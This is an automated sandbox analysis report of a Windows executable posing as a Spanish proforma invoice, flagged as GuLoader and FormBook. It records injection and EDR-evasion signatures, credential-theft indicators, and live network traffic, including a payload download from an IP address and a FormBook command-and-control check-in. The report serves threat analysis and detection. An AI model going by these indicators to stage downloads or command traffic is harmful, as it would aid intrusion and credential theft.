Windows Analysis Report
FACTURA PROFORMA MATRICULACI#U00d3N.exe

Overview

General Information

Sample name: FACTURA PROFORMA MATRICULACI#U00d3N.exe
Analysis ID: 1592061
MD5: 66d651e5546dedafd0a252400b70c21d
SHA1: e7d2f22f36489ab390a293bc9e0b048df09675f1
SHA256: 94df904f108f2aa1f8ffdbe2d119ac899fe12e664057792c51662878fdeb21ec

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected GuLoader
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection

Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe Avira: detected
Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe ReversingLabs: Detection: 21%
Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe Virustotal: Detection: 25%
Source: Yara match File source: 00000002.00000002.84425926740.0000000036460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.84737968184.0000000004730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.84737857706.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: mshtml.pdb source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000001.84198302200.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source: Binary string: wntdll.pdbUGP source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84314222092.00000000363AA000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84317744009.0000000036552000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp, rasphone.exe, 00000004.00000003.84401648864.0000000004665000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rasphone.pdb source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84366862346.0000000006570000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84314222092.00000000363AA000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84317744009.0000000036552000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp, rasphone.exe, rasphone.exe, 00000004.00000003.84401648864.0000000004665000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rasphone.pdbGCTL source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84366862346.0000000006570000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mshtml.pdbUGP source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000001.84198302200.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 0_2_00405C4D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405C4D
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 0_2_00402930 FindFirstFileW, 0_2_00402930
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 0_2_0040689E FindFirstFileW,FindClose, 0_2_0040689E
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 4x nop then mov ebx, 00000004h 2_2_3643052F
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 4x nop then mov ebx, 00000004h 3_2_006DC52F
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 4x nop then mov ebx, 00000004h 3_2_04912F18
Source: C:\Windows\SysWOW64\rasphone.exe Code function: 4x nop then mov ebx, 00000004h 4_2_04C1052F

Networking

Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49763 -> 67.223.117.189:80
Source: Joe Sandbox View IP Address: 67.223.117.189
Source: Joe Sandbox View ASN Name: VIMRO-AS15189US
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49762 -> 212.162.149.165:80
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.165
Source: global traffic HTTP traffic detected:
    GET /psKGLMYRljeu25.bin HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
    Host: 212.162.149.165
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
    GET /qb00/?CQRx1OZ=y6RGjgI4rKy0Y6DzFnE4ds/DujDyIwFNLNdcR+n+evPAM1AFOC6aSjfWGX6bXFIk+vpsjJoo09/MZkArP0uBTPlzJhQmz/zjZXCfq3NAyoUHFZTw2iUqUnI=&arsF=q7myW0OKNmfa9 HTTP/1.1
    Host: www.flourishno.life
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36
Source: global traffic DNS traffic detected: DNS query: www.fullhdfilmizlesene.uno
Source: global traffic DNS traffic detected: DNS query: www.brunokito.cloud
Source: global traffic DNS traffic detected: DNS query: www.flourishno.life
Source: global traffic HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Wed, 15 Jan 2025 17:20:57 GMT
    Server: Apache
    Content-Length: 32106
    Connection: close
    Content-Type: text/html; charset=utf-8
Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84414536804.0000000006533000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://212.162.149.165/
Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84414536804.0000000006559000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://212.162.149.165/Q
Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84414536804.0000000006559000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://212.162.149.165/psKGLMYRljeu25.bin
Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84414536804.0000000006559000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://212.162.149.165/psKGLMYRljeu25.bin9
Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84414536804.0000000006559000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://212.162.149.165/psKGLMYRljeu25.binE
Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84414536804.0000000006533000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://212.162.149.165/psKGLMYRljeu25.bino
Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84366946852.0000000006564000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84414819236.0000000006564000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84314914239.0000000006562000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://212.162.149.165/psKGLMYRljeu25.binu
Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000001.84198302200.0000000000649000.00000020.00000001.01000000.00000007.sdmp String found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000000.00000000.83096597469.000000000040A000.00000008.00000001.01000000.00000003.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000000.84196408647.000000000040A000.00000008.00000001.01000000.00000003.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000001.84198302200.0000000000649000.00000020.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.gopher.ftp://ftp.
Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000001.84198302200.0000000000626000.00000020.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000001.84198302200.00000000005F2000.00000020.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000001.84198302200.00000000005F2000.00000020.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: RAVCpl64.exe, 00000003.00000002.88184446311.0000000005CB8000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000001.84198302200.0000000000649000.00000020.00000001.01000000.00000007.sdmp String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: rasphone.exe, 00000004.00000002.84736393349.00000000029F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/
Source: rasphone.exe, 00000004.00000002.84736393349.00000000029F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com//
Source: rasphone.exe, 00000004.00000002.84736393349.00000000029F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/v104
Source: rasphone.exe, 00000004.00000003.84675419748.00000000079FA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdres://C:
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 0_2_00405705 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_00405705

E-Banking Fraud

Source: Yara match File source: 00000002.00000002.84425926740.0000000036460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.84737968184.0000000004730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.84737857706.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_367734E0 NtCreateMutant,LdrInitializeThunk, 2_2_367734E0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36772EB0 NtProtectVirtualMemory,LdrInitializeThunk, 2_2_36772EB0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36772D10 NtQuerySystemInformation,LdrInitializeThunk, 2_2_36772D10
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36772A80 NtClose,LdrInitializeThunk, 2_2_36772A80
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36772BC0 NtQueryInformationToken,LdrInitializeThunk, 2_2_36772BC0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36772B90 NtFreeVirtualMemory,LdrInitializeThunk, 2_2_36772B90
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36774570 NtSuspendThread, 2_2_36774570
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36774260 NtSetContextThread, 2_2_36774260
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36772E50 NtCreateSection, 2_2_36772E50
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36772E00 NtQueueApcThread, 2_2_36772E00
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36772ED0 NtResumeThread, 2_2_36772ED0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36772EC0 NtQuerySection, 2_2_36772EC0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36772E80 NtCreateProcessEx, 2_2_36772E80
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36772F30 NtOpenDirectoryObject, 2_2_36772F30
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36772F00 NtCreateFile, 2_2_36772F00
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36772FB0 NtSetValueKey, 2_2_36772FB0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36772C50 NtUnmapViewOfSection, 2_2_36772C50
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36773C30 NtOpenProcessToken, 2_2_36773C30
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36772C30 NtMapViewOfSection, 2_2_36772C30
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36772C20 NtSetInformationFile, 2_2_36772C20
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36772C10 NtOpenProcess, 2_2_36772C10
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36772CF0 NtDelayExecution, 2_2_36772CF0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36772CD0 NtEnumerateKey, 2_2_36772CD0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36773C90 NtOpenThread, 2_2_36773C90
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36772D50 NtWriteVirtualMemory, 2_2_36772D50
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36772DC0 NtAdjustPrivilegesToken, 2_2_36772DC0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36772DA0 NtReadVirtualMemory, 2_2_36772DA0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36772A10 NtWriteFile, 2_2_36772A10
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36772AC0 NtEnumerateValueKey, 2_2_36772AC0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36772AA0 NtQueryInformationFile, 2_2_36772AA0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36772B20 NtQueryInformationProcess, 2_2_36772B20
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36772B10 NtAllocateVirtualMemory, 2_2_36772B10
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36772B00 NtQueryValueKey, 2_2_36772B00
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36772BE0 NtQueryVirtualMemory, 2_2_36772BE0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36772B80 NtCreateKey, 2_2_36772B80
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_367738D0 NtGetContextThread, 2_2_367738D0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_367729F0 NtReadFile, 2_2_367729F0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_367729D0 NtWaitForSingleObject, 2_2_367729D0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36443619 NtSetContextThread, 2_2_36443619
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36443C5A NtResumeThread, 2_2_36443C5A
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36443944 NtSuspendThread, 2_2_36443944
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 3_2_049168F2 SleepEx,NtCreateSection, 3_2_049168F2
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 3_2_04916A7D SleepEx,NtResumeThread, 3_2_04916A7D
Source: C:\Windows\SysWOW64\rasphone.exe Code function: 4_2_04882CF0 NtDelayExecution,LdrInitializeThunk, 4_2_04882CF0
Source: C:\Windows\SysWOW64\rasphone.exe Code function: 4_2_04882C30 NtMapViewOfSection,LdrInitializeThunk, 4_2_04882C30
Source: C:\Windows\SysWOW64\rasphone.exe Code function: 4_2_04882D10 NtQuerySystemInformation,LdrInitializeThunk, 4_2_04882D10
Source: C:\Windows\SysWOW64\rasphone.exe Code function: 4_2_04882E50 NtCreateSection,LdrInitializeThunk, 4_2_04882E50
Source: C:\Windows\SysWOW64\rasphone.exe Code function: 4_2_04882F00 NtCreateFile,LdrInitializeThunk, 4_2_04882F00
Source: C:\Windows\SysWOW64\rasphone.exe Code function: 4_2_048829F0 NtReadFile,LdrInitializeThunk, 4_2_048829F0
Source: C:\Windows\SysWOW64\rasphone.exe Code function: 4_2_04882A80 NtClose,LdrInitializeThunk, 4_2_04882A80
Source: C:\Windows\SysWOW64\rasphone.exe Code function: 4_2_04882AC0 NtEnumerateValueKey,LdrInitializeThunk, 4_2_04882AC0
Source: C:\Windows\SysWOW64\rasphone.exe Code function: 4_2_04882A10 NtWriteFile,LdrInitializeThunk, 4_2_04882A10
Source: C:\Windows\SysWOW64\rasphone.exe Code function: 4_2_04882B80 NtCreateKey,LdrInitializeThunk, 4_2_04882B80
Source: C:\Windows\SysWOW64\rasphone.exe Code function: 4_2_04882B90 NtFreeVirtualMemory,LdrInitializeThunk, 4_2_04882B90
Source: C:\Windows\SysWOW64\rasphone.exe Code function: 4_2_04882BC0 NtQueryInformationToken,LdrInitializeThunk, 4_2_04882BC0
Source: C:\Windows\SysWOW64\rasphone.exe Code function: 4_2_04882B00 NtQueryValueKey,LdrInitializeThunk, 4_2_04882B00
Source: C:\Windows\SysWOW64\rasphone.exe Code function: 4_2_04882B10 NtAllocateVirtualMemory,LdrInitializeThunk, 4_2_04882B10
Source: C:\Windows\SysWOW64\rasphone.exe Code function: 4_2_048834E0 NtCreateMutant,LdrInitializeThunk, 4_2_048834E0
Source: C:\Windows\SysWOW64\rasphone.exe Code function: 4_2_04884570 NtSuspendThread, 4_2_04884570
Source: C:\Windows\SysWOW64\rasphone.exe Code function: 4_2_04884260 NtSetContextThread, 4_2_04884260
Source: C:\Windows\SysWOW64\rasphone.exe Code function: 4_2_04882CD0 NtEnumerateKey, 4_2_04882CD0
Source: C:\Windows\SysWOW64\rasphone.exe Code function: 4_2_04882C10 NtOpenProcess, 4_2_04882C10
Source: C:\Windows\SysWOW64\rasphone.exe Code function: 4_2_04882C20 NtSetInformationFile, 4_2_04882C20
Source: C:\Windows\SysWOW64\rasphone.exe Code function: 4_2_04882C50 NtUnmapViewOfSection, 4_2_04882C50
Source: C:\Windows\SysWOW64\rasphone.exe Code function: 4_2_04882DA0 NtReadVirtualMemory, 4_2_04882DA0
Source: C:\Windows\SysWOW64\rasphone.exe Code function: 4_2_04882DC0 NtAdjustPrivilegesToken, 4_2_04882DC0
Source: C:\Windows\SysWOW64\rasphone.exe Code function: 4_2_04882D50 NtWriteVirtualMemory, 4_2_04882D50
Source: C:\Windows\SysWOW64\rasphone.exe Code function: 4_2_04882E80 NtCreateProcessEx, 4_2_04882E80
Source: C:\Windows\SysWOW64\rasphone.exe Code function: 4_2_04882EB0 NtProtectVirtualMemory, 4_2_04882EB0
Source: C:\Windows\SysWOW64\rasphone.exe Code function: 4_2_04882EC0 NtQuerySection, 4_2_04882EC0
Source: C:\Windows\SysWOW64\rasphone.exe Code function: 4_2_04882ED0 NtResumeThread, 4_2_04882ED0
Source: C:\Windows\SysWOW64\rasphone.exe Code function: 4_2_04882E00 NtQueueApcThread, 4_2_04882E00
Source: C:\Windows\SysWOW64\rasphone.exe Code function: 4_2_04882FB0 NtSetValueKey, 4_2_04882FB0
Source: C:\Windows\SysWOW64\rasphone.exe Code function: 4_2_04882F30 NtOpenDirectoryObject, 4_2_04882F30
Source: C:\Windows\SysWOW64\rasphone.exe Code function: 4_2_048829D0 NtWaitForSingleObject, 4_2_048829D0
Source: C:\Windows\SysWOW64\rasphone.exe Code function: 4_2_04882AA0 NtQueryInformationFile, 4_2_04882AA0
Source: C:\Windows\SysWOW64\rasphone.exe Code function: 4_2_04882BE0 NtQueryVirtualMemory, 4_2_04882BE0
Source: C:\Windows\SysWOW64\rasphone.exe Code function: 4_2_04882B20 NtQueryInformationProcess, 4_2_04882B20
Source: C:\Windows\SysWOW64\rasphone.exe Code function: 4_2_04883C90 NtOpenThread, 4_2_04883C90
Source: C:\Windows\SysWOW64\rasphone.exe Code function: 4_2_04883C30 NtOpenProcessToken, 4_2_04883C30
Source: C:\Windows\SysWOW64\rasphone.exe Code function: 4_2_048838D0 NtGetContextThread, 4_2_048838D0
Source: C:\Windows\SysWOW64\rasphone.exe Code function: 4_2_028E97D1 NtClose, 4_2_028E97D1
Source: C:\Windows\SysWOW64\rasphone.exe Code function: 4_2_028E976B NtDeleteFile, 4_2_028E976B
Source: C:\Windows\SysWOW64\rasphone.exe Code function: 4_2_04C1F01D NtQueryInformationProcess,NtReadVirtualMemory, 4_2_04C1F01D
Source: C:\Windows\SysWOW64\rasphone.exe Code function: 4_2_04C23628 NtSetContextThread, 4_2_04C23628
Source: C:\Windows\SysWOW64\rasphone.exe Code function: 4_2_04C1F026 NtQueryInformationProcess, 4_2_04C1F026
Source: C:\Windows\SysWOW64\rasphone.exe Code function: 4_2_04C23C68 NtResumeThread, 4_2_04C23C68
Source: C:\Windows\SysWOW64\rasphone.exe Code function: 4_2_04C23F88 NtQueueApcThread, 4_2_04C23F88
Source: C:\Windows\SysWOW64\rasphone.exe Code function: 4_2_04C23948 NtSuspendThread, 4_2_04C23948
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 0_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess, 0_2_0040351C
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe File created: C:\Windows\resources\0409
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: String function: 367BEF10 appears 104 times
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: String function: 36775050 appears 36 times
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: String function: 3672B910 appears 268 times
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: String function: 36787BE4 appears 90 times
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: String function: 367AE692 appears 86 times
Source: C:\Windows\SysWOW64\rasphone.exe Code function: String function: 048BE692 appears 86 times
Source: C:\Windows\SysWOW64\rasphone.exe Code function: String function: 04885050 appears 58 times
Source: C:\Windows\SysWOW64\rasphone.exe Code function: String function: 048CEF10 appears 105 times
Source: C:\Windows\SysWOW64\rasphone.exe Code function: String function: 0483B910 appears 278 times
Source: C:\Windows\SysWOW64\rasphone.exe Code function: String function: 04897BE4 appears 102 times
Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000000.00000000.83096652287.0000000000453000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamebrigitts.exe4 vs FACTURA PROFORMA MATRICULACI#U00d3N.exe
Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84317744009.000000003667F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs FACTURA PROFORMA MATRICULACI#U00d3N.exe
Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84426043945.00000000369D0000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs FACTURA PROFORMA MATRICULACI#U00d3N.exe
Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84314222092.00000000364CD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs FACTURA PROFORMA MATRICULACI#U00d3N.exe
Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000000.84196435867.0000000000453000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamebrigitts.exe4 vs FACTURA PROFORMA MATRICULACI#U00d3N.exe
Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs FACTURA PROFORMA MATRICULACI#U00d3N.exe
Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84366862346.0000000006570000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamerasphone.exej% vs FACTURA PROFORMA MATRICULACI#U00d3N.exe
